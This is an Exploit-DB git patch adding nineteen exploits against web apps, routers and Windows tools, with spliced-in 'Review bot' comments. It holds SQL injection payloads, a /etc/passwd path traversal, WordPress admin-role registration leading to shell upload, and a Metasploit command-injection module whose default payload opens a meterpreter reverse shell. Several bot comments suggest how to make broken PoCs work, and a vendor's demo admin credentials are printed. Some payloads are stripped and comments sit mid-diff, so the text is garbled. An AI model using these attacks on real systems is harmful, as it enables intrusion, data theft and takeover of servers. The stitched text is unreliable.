From deaee53895d9efff89051ba9b7aaa93fa830545f Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 8 Jan 2019 05:01:58 +0000 Subject: [PATCH] DB: 2019-01-08 19 changes to exploits/shellcodes Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC) SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC) Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation Mailcleaner - Authenticated Remote Code Execution (Metasploit) Embed Video Scripts - Persistent Cross-Site Scripting All in One Video Downloader 1.2 - Authenticated SQL Injection LayerBB 1.1.1 - Persistent Cross-Site Scripting MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS) --- exploits/cgi/webapps/46081.txt | 20 ++++ exploits/hardware/webapps/46092.py | 49 ++++++++ exploits/php/webapps/46076.txt | 36 ++++++ exploits/php/webapps/46077.txt | 20 ++++ exploits/php/webapps/46079.txt | 24 ++++ exploits/php/webapps/46080.txt | 26 ++++ exploits/php/webapps/46082.txt | 157 ++++++++++++++++++++++++ exploits/php/webapps/46083.txt | 54 +++++++++ exploits/php/webapps/46084.txt | 34 ++++++ exploits/php/webapps/46085.txt | 177 ++++++++++++++++++++++++++++ exploits/python/remote/46075.rb | 144 ++++++++++++++++++++++ exploits/windows/dos/46078.html | 51 ++++++++ exploits/windows/dos/46087.py | 25 
++++ exploits/windows/dos/46088.py | 25 ++++ exploits/windows/dos/46089.py | 30 +++++ exploits/windows/local/46093.txt | 71 +++++++++++ exploits/windows/webapps/46086.txt | 60 ++++++++++ exploits/windows/webapps/46090.html | 58 +++++++++ exploits/windows/webapps/46091.html | 83 +++++++++++++ files_exploits.csv | 19 +++ 20 files changed, 1163 insertions(+) create mode 100644 exploits/cgi/webapps/46081.txt create mode 100755 exploits/hardware/webapps/46092.py create mode 100644 exploits/php/webapps/46076.txt create mode 100644 exploits/php/webapps/46077.txt create mode 100644 exploits/php/webapps/46079.txt create mode 100644 exploits/php/webapps/46080.txt create mode 100644 exploits/php/webapps/46082.txt create mode 100644 exploits/php/webapps/46083.txt create mode 100644 exploits/php/webapps/46084.txt create mode 100644 exploits/php/webapps/46085.txt create mode 100755 exploits/python/remote/46075.rb create mode 100644 exploits/windows/dos/46078.html create mode 100755 exploits/windows/dos/46087.py create mode 100755 exploits/windows/dos/46088.py create mode 100755 exploits/windows/dos/46089.py create mode 100644 exploits/windows/local/46093.txt create mode 100644 exploits/windows/webapps/46086.txt create mode 100644 exploits/windows/webapps/46090.html create mode 100644 exploits/windows/webapps/46091.html diff --git a/exploits/cgi/webapps/46081.txt b/exploits/cgi/webapps/46081.txt new file mode 100644 index 000000000..6ae620f74 --- /dev/null +++ b/exploits/cgi/webapps/46081.txt 
@@ -0,0 +1,20 @@
+# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Reflected XSS
+# Date: 21/12/2018
+# Exploit Author: Kumar Saurav
+# Reference: https://0dayfindings.home.blog/2018/12/26/plc-wireless-router-gpn2-4p21-c-cn-reflected-xss/
+# Vendor: ChinaMobile
+# Category: Hardware
+# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
+# Tested on: Multiple
+# CVE : CVE-2018-20326
+
+#Description: PLC Wireless Router's are vulnerable to a Reflected Cross Site Scripting (XSS).With this attack, the threat actor can steal cookies, session id, username or other sensitive information redirect an innocent victim to a malicious website, thus compromising the user.
+
+Reproduction Steps:
+Step 1: Go to Wi-fi Router Gateway (192.168.59.254 in my case)
+Step 2: Login as Username and Password
+Step 3: After Login below url will be shown
+ (http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-)
+Step 4: Insert the payload "" at the end of the above mentinoed url and hit enter
+ (http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-)
+Step 5: On execution of the payload, it will be popped up as "XSS-Saurav"
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46092.py b/exploits/hardware/webapps/46092.py
new file mode 100755
index 000000000..b1b5c4531
--- /dev/null
+++ b/exploits/hardware/webapps/46092.py
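Review bot: The reproduction steps never say which query parameter reflects, and both URLs in Step 3 and Step 4 are printed as `cgi-bin/webprocgetpage=` (the `?` after `webproc` appears to have been lost) with the payload reduced to `""`, so the PoC cannot be replayed as written. Name the parameter and give the literal request, e.g. `GET /cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=<payload>` — assuming `var:subpage` is the sink, which the text does not actually confirm. The Step 2 precondition also makes this a post-authentication reflected XSS: the cookie/session-theft impact claimed in the description only holds for a victim who is already logged into the gateway and is lured to the crafted link.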
@@ -0,0 +1,49 @@ +# Exploit Title: Huawei E5330 Cross-Site Request Forgery (Send SMS) +# Date: 01/07/2019 +# Exploit Author: Nathu Nandwani +# Website: http://nandtech.co/ +# Vendor Homepage: https://consumer.huawei.com/in/mobile-broadband/e5330/ +# Version: 21.210.09.00.158 +# Tested on: Windows 10 x64 +# CVE: CVE-2014-5395 +# Note: The administrator who opens the URL should be authenticated. +import socket +import time + +server_ip = "0.0.0.0" +server_port = 80 + +huawei_ip = "192.168.8.1" +receiving_phone_no = "01234567890" +sms_text = "This is a SPAM text from Huawei E5330" + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.bind((server_ip, server_port)) +sock.listen(1) + +print "Currently listening at " + server_ip + ":" + str(server_port) + +client, (client_host, client_port) = sock.accept() + +print "Client connected: " + client_host + ":" + str(client_port) +print "" +print client.recv(1000) + +client.send('HTTP/1.0 200 OK\r\n') +client.send('Content-Type: text/html\r\n') +client.send('\r\n') + +client.send(""" + + + + + +""") + +client.close() +sock.close() \ No newline at end of file diff --git a/exploits/php/webapps/46076.txt b/exploits/php/webapps/46076.txt new file mode 100644 index 000000000..56d1d96fb --- /dev/null +++ b/exploits/php/webapps/46076.txt 
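Review bot: The CSRF page this script serves is missing — the `client.send("""...""")` body between the `Content-Type` header and `client.close()` is empty in this listing, so a victim who connects receives a blank page and no SMS is sent; the auto-submitting form targeting the E5330 SMS endpoint has to be restored, and `huawei_ip`, `receiving_phone_no` and `sms_text` are only meaningful once that body references them. Separately, binding `0.0.0.0:80` requires root and exposes the listener on every interface, and without `sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)` before `sock.bind(...)` a second run shortly after the first fails with EADDRINUSE. The listener also serves exactly one connection and then exits, which is fine for a PoC but worth stating in the `# Note:` line. `import time` is unused.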
@@ -0,0 +1,36 @@
+# Exploit Title: Embed Video Scripts - Cross-site Script (stored)
+# Google Dork: N/A
+# Date: 1 Jan 2019
+# Exploit Author: Deyaa Muhammad
+# Author EMail: contact [at] deyaa.me
+# Author Blog: http://deyaa.me
+# POC Video: https://youtu.be/2CFJLwkxpT8
+# Vendor Homepage: https://codeawesome.in/embed/
+# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073
+# Demo Website: https://codeawesome.in/embed/
+# Version: N/A
+# Tested on: WIN7_x68/Linux
+# CVE : N/A
+
+# Description:
+A stored xss found in "Embed Video Scripts" comments section.
+
+# POC Request:
+
+:method: POST
+:authority: server
+:scheme: https
+:path: /embed/comments
+content-length: 145
+accept: */*
+origin: https://server
+x-requested-with: XMLHttpRequest
+user-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+content-type: application/x-www-form-urlencoded; charset=UTF-8
+accept-encoding: gzip, deflate, br
+accept-language: en-US,en;q=0.9
+cookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540
+cookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6
+cookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6
+
+message=&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png
\ No newline at end of file
diff --git a/exploits/php/webapps/46077.txt b/exploits/php/webapps/46077.txt
new file mode 100644
index 000000000..ae4b0dcd4
--- /dev/null
+++ b/exploits/php/webapps/46077.txt
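Review bot: The request body `message=&post_id=1&save=1&avatar=...` has an empty `message`, i.e. the stored-XSS payload itself is absent from the PoC (the `content-length: 145` header is larger than the printed body, consistent with it having been dropped), so the advisory shows where the injection goes but not what was injected; state the payload and where it renders. The request also carries what look like real `__cfduid`/`_tccl_visitor`/`_tccl_visit` cookie values from the author's session — these should be redacted the way the host was replaced with `server`. The POST carries no application session cookie or CSRF token, which suggests the comment endpoint is unauthenticated and the stored payload fires for every reader of `post_id=1`, but that is not stated and should be confirmed.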
@@ -0,0 +1,20 @@
+# Exploit Title: All in One Video Downloader 1.2 - SQL Injection
+# Google Dork: "developed by Niche Office"
+# Date: 1 Jan 2019
+# Exploit Author: Deyaa Muhammad
+# Author EMail: contact [at] deyaa.me
+# Author Blog: http://deyaa.me
+# Vendor Homepage: https://nicheoffice.web.tr/
+# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418
+# Demo Website: https://aiovideodl.ml/
+# Demo Admin Panel: https://aiovideodl.ml/admin/
+# Demo Admin Credentials: demo@aiovideodl.ml/123456
+# Version: 1.2
+# Tested on: WIN7_x68/cloudflare
+# CVE : N/A
+
+# POC:
+https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -
+
+# Exploit:
+https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -
\ No newline at end of file
diff --git a/exploits/php/webapps/46079.txt b/exploits/php/webapps/46079.txt
new file mode 100644
index 000000000..685e14bbf
--- /dev/null
+++ b/exploits/php/webapps/46079.txt
@@ -0,0 +1,24 @@
+# Exploit Title: LayerBB 1.1.1 - Cross-Site Scripting
+# Date: 10/4/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=26
+# Version: 1.1.1
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2018-17997
+
+
+1. Description:
+LayerBB is a free open-source forum software. The XSS found allows users to add a payload to the title of conversations (PMs).
+
+
+2. Proof of Concept:
+
+- Start a new conversation sending to any user (victim) you want
+- Use a payload in the title
+- Next time the user (victim) visits the site payload will execute
+
+
+3. Solution:
+Update to 1.1.2
\ No newline at end of file
diff --git a/exploits/php/webapps/46080.txt b/exploits/php/webapps/46080.txt
new file mode 100644
index 000000000..acd0a6810
--- /dev/null
+++ b/exploits/php/webapps/46080.txt
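Review bot: The injection point `admin/?view=page-edit&id=` sits under `/admin/`, so this is a post-authentication SQLi as the commit title says, but the advisory header does not say so and instead publishes the vendor's live demo admin credentials next to it; reproducing against `aiovideodl.ml` is testing a third party's production host, and the text should direct readers to a local install. The UNION payload fixes the column count at five (`SELECT 1,2,3,4,concat(...)`), which is specific to the query behind `page-edit` in this version and is worth stating as such. The `id=2.9'` prefix shows the value is interpolated inside a quoted string, so the vendor-side fix is a prepared statement (or a strict integer cast of `id`), not output filtering.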
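Review bot: The proof of concept for LayerBB names neither the request nor the field — it says only "Use a payload in the title" — so a reader cannot tell whether the sink is the inbox list, the conversation view, or both, nor whether the payload has to survive any filtering. Add the POST target and parameter used when starting a conversation and a minimal payload such as `<script>alert(document.domain)</script>`, and say where it executed. "Update to 1.1.2" is the only actionable line in the file; it would help to state what the fix changed (presumably output encoding of the title) so backports can be verified.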
@@ -0,0 +1,26 @@ +# Exploit Title: MyBB OUGC Awards Plugin v1.8.3 - Cross-Site Scripting +# Date: 12/31/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=396 +# Version: 1.8.3 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2019-3501 + + +1. Description: +OUGC Awards plugin for MyBB forum allows admins and moderators to grant awards to users which displays on profiles/posts. The reason input isn't sanitized on awards page and user profiles. + + +2. Proof of Concept: + +- Have a mod account level or higher +- Go to Manage Awards in ModCP +- Give an award to a user and input payload for reason + +- Payload executes when viewing award on awards.php and user profiles. + + +3. Solution: +Update to 1.8.19 \ No newline at end of file diff --git a/exploits/php/webapps/46082.txt b/exploits/php/webapps/46082.txt new file mode 100644 index 000000000..7b4972b84 --- /dev/null +++ b/exploits/php/webapps/46082.txt @@ -0,0 +1,157 @@ +################################################################################################################################## +# Exploit Title: phpMoAdmin 1.1.5 - MongoDB GUI | Multiple Vulnerabilities +# Date: 03.01.2019 +# Exploit Author: Ozer Goker +# Vendor Homepage: http://www.phpmoadmin.com +# Software Link: http://www.phpmoadmin.com/file/phpmoadmin.zip +# Version: 1.1.5 +################################################################################################################################## + +Introduction + +phpMoAdmin - MongoDB GUI +MongoDB administration tool for PHP + +Vulnerabilities: CSRF | XSS Reflected & Stored + +CSRF details: + +################################################################################# + +CSRF1 + +Create Database + + + + +
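Review bot: The precondition "Have a mod account level or higher" makes the OUGC Awards issue a moderator-to-administrator stored XSS, since the award reason renders on `awards.php` and on user profiles that administrators also view; the description should say so, because the impact is escalation between staff tiers rather than an anonymous-user bug. The PoC names the field (the reason on the ModCP Manage Awards page) but gives no request or payload; adding the POST parameter name and an example payload would make it reproducible. "Update to 1.8.19" is the fix; only 1.8.3 was tested, so the affected range between those versions is presumed rather than verified.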
+ + + +
+ + + + +################################################################################# + +CSRF2 + +Drop Database + + + +
+ + + +
+ + + +################################################################################# + +CSRF3 + +Repair Database + + + +
+ + + +
+ + + +################################################################################# + +CSRF4 + +Add New Collection + + + +
+ + + + +
+ + + +################################################################################# + +CSRF5 + +Drop Collection + + + +
+ + + + +
+ + + + +################################################################################# + + +XSS details: + +################################################################################# + +XSS1 | Reflected + +URL +http://localhost/phpmoadmin/moadmin.php?db=admin%3Cscript%3Ealert(1)%3C/script%3E + +METHOD +Get + +PARAMETER +db + +PAYLOAD + + +################################################################################# + +XSS2 | Reflected + +URL +http://localhost/phpmoadmin/moadmin.php?db=new.database&newdb=testdb%3Cscript%3Ealert(2)%3C/script%3E + +METHOD +Get + +PARAMETER +newdb + +PAYLOAD + + +################################################################################# + +XSS3 | Stored +URL +http://localhost/phpmoadmin/moadmin.php?collection=%3Cscript%3Ealert%283%29%3C%2Fscript%3E&action=createCollection&db=testdb + +METHOD +Get + +PARAMETER +collection + +PAYLOAD + + + +################################################################################# \ No newline at end of file diff --git a/exploits/php/webapps/46083.txt b/exploits/php/webapps/46083.txt new file mode 100644 index 000000000..9cbc4cae0 --- /dev/null +++ b/exploits/php/webapps/46083.txt 
@@ -0,0 +1,54 @@ +# Exploit Title: Wordpress Plugin UserPro < 4.9.21 User Registration With Administrator Role +# Google Dork: inurl:/wp-content/plugins/userpro/ +# Date: 3rd January, 2019 +# Exploit Author: Noman Riffat +# Vendor Homepage: https://userproplugin.com/ +# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681 +# Version: < 4.9.21 +# Tested on: Wordpress 4.9.9 with linux but should work on all WP versions and OS as well + +UserPro fixed a user registration with administrator privileges vulnerability in version 4.9.21 +But there wasn't any POC available so this exploit demonstrates this +vulnerability. +https://demo.userproplugin.com/wp-content/plugins/userpro/changelog.txt +From the changelog: "Security Fix : Registration role validation fix" + +The latest version up to now is 4.9.29 +The vulnerability allows anyone to register with Administrator role which +can easily be turned into RCE + +Steps to reproduce: + +1. Go to the registration form, input random fake values, trigger Burp +Suite and click submit. + +2. The POST data will look similar to following + +redirect_uri-701=&_myuserpro_nonce=xxxxxx&_wp_http_referer=%2F&unique_id=701&user_login-701=USERNAME&user_email-701= +USERNAME@EMAIL.COM +&user_pass-701=PASSWORD&user_pass_confirm-701=PASSWORD&display_name-701=&profilepicture-701=&country-701=&facebook-701=&twitter-701=&google_plus-701=&user_url-701=&terms=on&action=userpro_process_form&template=register&group=default&shortcode=xxxxxxxxxxxxxxxxxxxxxxxxxxx + +Here "-701" is a random postfix number and gets stripped at the server. +Other than that, the interesting values are + +user_login +user_email +user_pass +user_pass_confirm + +3. Adding following extra parameter in POST data will register the user +with Administrator privileges + +role-701=administrator + +So the modified POST data will look similar to following + +role-701=administrator&redirect_uri-701=&_myuserpro_nonce=xxxxxx&....snip....snip.... + +4. 
Forward the POST data in Burp Suite and you will get redirect to +/profile/ page with Administrator menu on top. Access /wp-admin/ to get to +the dashboard + +5. Upload shell with default methods + +@nomanriffat \ No newline at end of file diff --git a/exploits/php/webapps/46084.txt b/exploits/php/webapps/46084.txt new file mode 100644 index 000000000..48c6eff50 --- /dev/null +++ b/exploits/php/webapps/46084.txt @@ -0,0 +1,34 @@ +# Exploit Title: MyT-PM 1.5.1 - 'Charge[group_total]' SQL Injection +# Date: 03.01.2019 +# Exploit Author: Mehmet Önder Key +# Vendor Homepage: https://manageyourteam.net/ +# Software Link: https://sourceforge.net/projects/myt/ +# Version: v1.5.1 +# Category: Webapps +# Tested on: WAMPP @Win +# Software description: +MyT (Manage Your Team) - is a free open source task management and project +management system, based on Yii Framework, easy to use and with a great +perspective of growth for the future. + +# Vulnerabilities: +# An attacker can access all data following an un/authorized user login +using the parameter. + +# POC - SQL Injection : + +# Parameter: Charge[group_total](POST) +# Request URL: /charge/admin + +# Type : Error Based +# Payload: Charge[user_name]=k&Charge[group_total]=1) AND +EXTRACTVALUE(2003,CONCAT(0x5c,0x7171716b71,(SELECT +(ELT(2003=2003,1))),0x7170707071))-- eaYu&Charge_page=1&ajax=charge-grid + +# Type : Time-Based Blind +# Payload: Charge[user_name]=k&Charge[group_total]=1) AND (SELECT * FROM +(SELECT(SLEEP(5)))ggBK)-- mGKC&Charge_page=1&ajax=charge-grid + +# Type : Stacked Queries +# Payload: Charge[user_name]=k&Charge[group_total]=1);SELECT +SLEEP(5)#&Charge_page=1&ajax=charge-grid \ No newline at end of file diff --git a/exploits/php/webapps/46085.txt b/exploits/php/webapps/46085.txt new file mode 100644 index 000000000..e061172d7 --- /dev/null +++ b/exploits/php/webapps/46085.txt 
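Review bot: The root cause in step 3 — the server honours a client-supplied `role-701=administrator` field on the public registration form — means the 4.9.21 fix is server-side role validation, and defenders still on older versions should treat any registration POST to `action=userpro_process_form` that carries a `role` parameter as hostile; a WordPress-level mitigation is to force the registration role in a `user_register` hook regardless of what the plugin passes. The attacker also chooses `user_pass`, so the resulting account persists across sessions and should be hunted for as `wp_capabilities` entries containing `administrator` whose creation lines up with UserPro registrations. Step 5's "Upload shell with default methods" is the standard admin-to-RCE path (theme/plugin editor or plugin upload) and is not specific to this bug.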
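Review bot: The MyT advisory's "following an un/authorized user login" leaves it unclear whether `/charge/admin` is reachable without a session, and the commit title does not say "Authenticated" either; state which it is, since that changes the severity substantially. All three payloads close an open parenthesis (`Charge[group_total]=1) AND ...`), which indicates the value is interpolated unquoted inside a parenthesised expression; the stacked-query variant (`1);SELECT SLEEP(5)#`) additionally depends on the database driver allowing multiple statements, which the error-based and time-based variants do not. The fix is to bind `group_total` as a parameter in the Yii query rather than concatenating it.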
@@ -0,0 +1,177 @@ +====================================================================== +Exploit Title:: Multiple Vulnerabilities +Software: Roxy Fileman +Version: 1.4.5 +Vendor Homepage: http://www.roxyfileman.com/ +Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-php +CVE number: CVE-2018-20525, CVE-2018-20526 +Found: 2018-12-07 +Tested on: PHP 7.0, Ubuntu 16.04 LTS +Author: Pongtorn Angsuchotmetee, Vittawat Masaree +SnoopBees Lab +https://www.snoopbees.com +======================================================================= +Description +=============================================================== +Roxy Fileman is free open source file browser for .NET and PHP, ready for +use with CKEditor and TinyMCE WYSIWYG html editors. It could be easily +integrated into a CMS or any other web application. Fileman is based on +JQuery and JQueryUI libraries and it's compatible with all modern browsers +- Internet Explorer, Firefox, Google Chrome, Safary and Opera. + +Roxy Fileman is designed to be as flexible as possible. The client +interface is completely separated from the server-side logic and scripts, +thus can be used with any server programming language - PHP, ASP .NET, +Python, Cold Fusion etc. All data exchanged including configuration and +language files is in light weight JSON format. Great performance - all data +from the server is loaded using Ajax without page reloading. Fileman has +ready to use distributions for PHP and .NET. All client-server +communications and configuration files are in JSON format and are language +independent. See custom server side scripts. +Ref: http://www.roxyfileman.com/ + +Vulnerability +================================== + + 1. Path Traversal (CVE-2018-20525) + 2. 
Unrestricted File Upload (CVE-2018-20526) + +================================== + +Proof of Concept +=========================== +1) Path Traversal (CVE-2018-20525) +================================== +The vulnerability affected file “copydir.php", “copyfile.php", +“fileslist.php". It is we can manipulating variables that reference files +with “dot-dot-slash (../)” to access arbitrary files and directories +access on file system. After copied the system file will appear on Roxy +file manager “http://[IP-Address]/fileman/Uploads". + +################################################# +---------------------------------------------------------------------------------- + +1.1. copydir.php + +POST /fileman/php/copydir.php HTTP/1.1 +Host: 10.10.10.190 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.10.10.190/fileman/index.html +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 78 +Connection: close +Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; +roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list + +d=%2Ffileman%2FUploads%2F*/../../../../../../../../etc/*&n=%2Ffileman%2FUploads/ + + +---------------------------------------------------------------------------------- + + +1.2. 
copyfile.php + +POST /fileman/php/copyfile.php HTTP/1.1 +Host: 10.10.10.190 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.10.10.190/fileman/index.html +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 66 +Connection: close +Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; +roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list + +f=%2Ffileman%2FUploads%2F*/../../../../../../../../etc/passwd*&type= +---------------------------------------------------------------------------------- + + +1.3. filelist.php + +POST /fileman/php/fileslist.php HTTP/1.1 +Host: 10.10.10.190 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.10.10.190/fileman/index.html +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 65 +Connection: close +Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; +roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list + +d=%2Ffileman%2FUploads%2FImages*/../../../../../../../../etc*&type= + +############################################################## +============================ +2) Unrestricted File Upload (CVE-2018-20526) +================================== +The vulnerability affected file upload.php and in the condition that the +php.ini file need have add the “*AddHandler php7-script .php*”. 
And now we +can upload the shell code file to the server by double extension such +as *shellcode.php.png +* + +-------------------------------------------------------------------------------------------------------------------- + +POST /fileman/php/upload.php HTTP/1.1 +Host: 10.10.10.190 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) +Gecko/20100101 Firefox/64.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://10.10.10.190/fileman/index.html +Content-Type: multipart/form-data; +boundary=---------------------------67141620012509 +Content-Length: 547 +Connection: close +Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; roxyld=%2Ffileman%2FUploads; +roxyview=list + +-----------------------------67141620012509 +Content-Disposition: form-data; name="action" + +upload +-----------------------------67141620012509 +Content-Disposition: form-data; name="method" + +ajax +-----------------------------67141620012509 +Content-Disposition: form-data; name="d" + +/fileman/Uploads +-----------------------------67141620012509 +Content-Disposition: form-data; name="files[]"; filename="*phpshell.php.png*" + +Content-Type: image/png + +* * +-----------------------------67141620012509-- + +------------------------------------------------------------------------------------------------------------------------------------------- + + +Timeline +================================== +2018-12-07: Discovered the bug +2018-12-11: Reported to vendor (The vendor is unresponsive) +2018-12-19: Reported to vendor (The vendor is unresponsive) +2018-12-27: Request CVE +2019-01-03: Advisory published + +Discovered By: +===================== +Pongtorn Angsuchotmetee, Vittawat Masaree \ No newline at end of file diff --git a/exploits/python/remote/46075.rb b/exploits/python/remote/46075.rb new file mode 100755 index 000000000..e36153226 --- /dev/null +++ b/exploits/python/remote/46075.rb 
@@ -0,0 +1,144 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Mailcleaner Remote Code Execution", + 'Description' => %q{ + This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an + operating system command under the context of the web server user which is root. + + /admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing + operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'WfsDelay' => 5, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python', 'unix'], + 'Arch' => [ ARCH_PYTHON, ARCH_CMD ], + 'Targets' => + [ + [ + 'Python payload', + { + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + } + ], + [ + 'Command payload', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'BadChars' => "\x26", + } + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Dec 19 2018", + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(443), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']), + OptString.new('USERNAME', [true, 'The username to login as']), + OptString.new('PASSWORD', [true, 'The password to login with']) + ] + ) + end + + def username + datastore['USERNAME'] + end + + def 
password + datastore['PASSWORD'] + end + + def auth + print_status('Performing authentication...') + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'admin/') + }) + + if res && !res.get_cookies.empty? + cookie = res.get_cookies + else + fail_with(Failure::UnexpectedReply, 'Did not get cookie-set header from response.') + end + + # Performing authentication + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'admin/'), + 'cookie' => cookie, + 'vars_post' => { + 'username' => username, + 'password' => password, + 'submit' => 'Log+in' + } + }) + + if res && res.code == 302 + print_good("Awesome..! Authenticated with #{username}:#{password}") + else + fail_with(Failure::NoAccess, 'Credentials are not valid.') + end + + cookie + end + + def exploit + cookie = auth + + if cookie.nil? + fail_with(Failure::Unknown, 'Something went wrong!') + end + + print_status('Exploiting command injection flaw') + + if target['Arch'] == ARCH_PYTHON + cmd = "';$(python -c \"#{payload.encoded}\");#" + else + cmd = "';#{payload.encoded};#" + end + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'), + 'cookie' => cookie, + 'vars_post' => { + 'search' => rand_text_alpha(5), + 'domain' => cmd, + 'submit' => 1 + } + }) + + end +end \ No newline at end of file diff --git a/exploits/windows/dos/46078.html b/exploits/windows/dos/46078.html new file mode 100644 index 000000000..29021809a --- /dev/null +++ b/exploits/windows/dos/46078.html @@ -0,0 +1,51 @@ + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/exploits/windows/dos/46087.py b/exploits/windows/dos/46087.py new file mode 100755 index 000000000..02e2dac54 --- /dev/null +++ b/exploits/windows/dos/46087.py 
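Review bot: `auth` accepts any `302` from the login POST as success (`if res && res.code == 302`), but a failed login that redirects back to the form would be reported as `Authenticated` too; also check that the redirect target is the admin landing page rather than the login page (the exact `Location` value needs confirming against MailCleaner). `print_good("Awesome..! Authenticated with #{username}:#{password}")` echoes the cleartext password into the console and logs, where the username alone would do. The module sets `'Privileged' => false` while its own description says the web server user is root — if that holds, `'Privileged' => true` is the accurate flag for post-exploitation. The final `send_request_cgi` in `exploit` discards its response, so a rejected request gives no diagnostic; at least `vprint_status` the returned status code.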
@@ -0,0 +1,25 @@
+# Exploit Title: BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)
+# Discovery by: Luis Martinez
+# Discovery Date: 2019-01-04
+# Vendor Homepage: www.nsauditor.com
